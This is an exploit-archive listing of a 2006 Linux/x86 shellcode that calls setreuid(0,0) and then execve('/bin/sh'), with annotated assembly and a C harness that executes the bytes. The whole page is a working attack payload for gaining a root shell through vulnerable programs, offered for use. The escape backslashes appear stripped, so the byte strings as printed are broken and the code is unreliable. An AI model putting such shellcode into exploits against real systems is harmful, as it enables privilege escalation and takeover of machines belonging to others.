[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes
# Published : 2006-04-03
# Author : Gotfault Security
# Previous Title : linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes
# Next Title : linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+
/*
* (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])
* - 33 bytes
* - xgc@gotfault.net
*
*/
char shellcode[] =
"x6ax46" // push $0x46
"x58" // pop %eax
"x31xdb" // xor %ebx, %ebx
"x31xc9" // xor %ecx, %ecx
"xcdx80" // int $0x80
"x31xd2" // xor %edx, %edx
"x6ax0b" // push $0xb
"x58" // pop %eax
"x52" // push %edx
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3" // mov %esp, %ebx
"x52" // push %edx
"x53" // push %ebx
"x89xe1" // mov %esp, %ecx
"xcdx80"; // int $0x80
int main() {
int (*f)() = (int(*)())shellcode;
printf("Length: %un", strlen(shellcode));
f();
}
// www.Syue.com [2006-04-03]